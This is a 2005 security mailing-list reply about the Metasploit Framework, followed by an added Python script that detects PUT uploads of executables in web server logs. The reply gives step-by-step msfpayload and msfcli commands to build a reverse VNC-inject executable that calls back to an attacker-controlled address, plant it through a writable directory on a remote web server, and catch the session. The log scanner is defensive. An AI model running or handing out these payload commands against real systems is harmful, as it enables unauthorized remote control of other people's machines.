Reverse Shell / VNC from a writeable directory on a remote site
From: hdm at metasploit.com (H D Moore)
Date: Fri, 5 Aug 2005 15:17:22 -0500

You *might* be able to use msfpayload and the payload_handler exploit to
do this, but for reasons I have yet to investigate, the VNC payload isn't
working well under the exe loader. The process for this is:

1) Generate an executable:

   $ msfpayload win32_reverse_vncinject LHOST=126.96.36.199 LPORT=3333 X > test.exe

2) Copy the executable to your target somehow.

3) Start up the Framework with the payload_handler exploit module:

   $ msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=188.8.131.52

4) Execute the standalone payload stager on the target system.

5) Enjoy your happy VNC access, assuming you have write access to the
   current interactive desktop.

This process has been tested with most of the win32 Metasploit payloads,
but YMMV. This is a handy way to load up meterpreter via client-side
execution bugs too ;-)

On Friday 05 August 2005 06:16, AsTriXs wrote:
> I have found a few writable directories on a remote web server on
> which I am doing a Pen-Test.
> I have been able to upload a file using the PUT command. How do I set up a
> reverse shell or a VNC from this stage? Does Metasploit provide an option?
> What would be the procedure to achieve the same?
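
Seen from the defending side, the PUT upload described in the quoted question leaves a trace in the web server's access log. The following is an added example, not part of the original thread: it scans Common Log Format lines for PUT requests and marks accepted uploads whose path has an executable extension. The sample log lines, the extension list and the function name are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Common/Combined Log Format: host ident user [time] "METHOD target PROTO" status size
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumption: extensions treated as executable content on the server being monitored.
EXECUTABLE_EXT = {".exe", ".dll", ".scr", ".bat", ".cmd", ".asp", ".aspx", ".php", ".jsp"}


def find_put_uploads(lines):
    """Return one finding per PUT request: accepted uploads and rejected attempts."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "PUT":
            continue
        # Decode %-escapes so "test%2Eexe" is classified like "test.exe".
        path = unquote(urlsplit(m["target"]).path)
        name = path.rsplit("/", 1)[-1].lower()
        ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
        status = int(m["status"])
        findings.append({
            "host": m["host"],
            "time": m["time"],
            "path": path,
            "accepted": 200 <= status < 300,  # e.g. 201 Created, 204 No Content
            "executable": ext in EXECUTABLE_EXT,
        })
    return findings


# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Aug/2005:06:10:01 -0500] "GET /index.html HTTP/1.1" 200 1043',
    '192.0.2.10 - - [05/Aug/2005:06:11:12 -0500] "PUT /admin/probe.txt HTTP/1.1" 403 210',
    '192.0.2.10 - - [05/Aug/2005:06:11:40 -0500] "PUT /uploads/probe.txt HTTP/1.1" 201 0',
    '192.0.2.10 - - [05/Aug/2005:06:12:05 -0500] "PUT /uploads/test%2Eexe HTTP/1.1" 201 0',
    '198.51.100.7 - - [05/Aug/2005:06:13:00 -0500] "POST /form.cgi HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for f in find_put_uploads(SAMPLE_LOG):
        level = "ALERT" if f["accepted"] and f["executable"] else "review"
        print(level, f["host"], f["time"], f["path"],
              "accepted" if f["accepted"] else "rejected")
```

Rejected PUTs are kept as "review" findings because a run of 403/405 responses followed by a 201 from the same host shows which directory turned out to be writable.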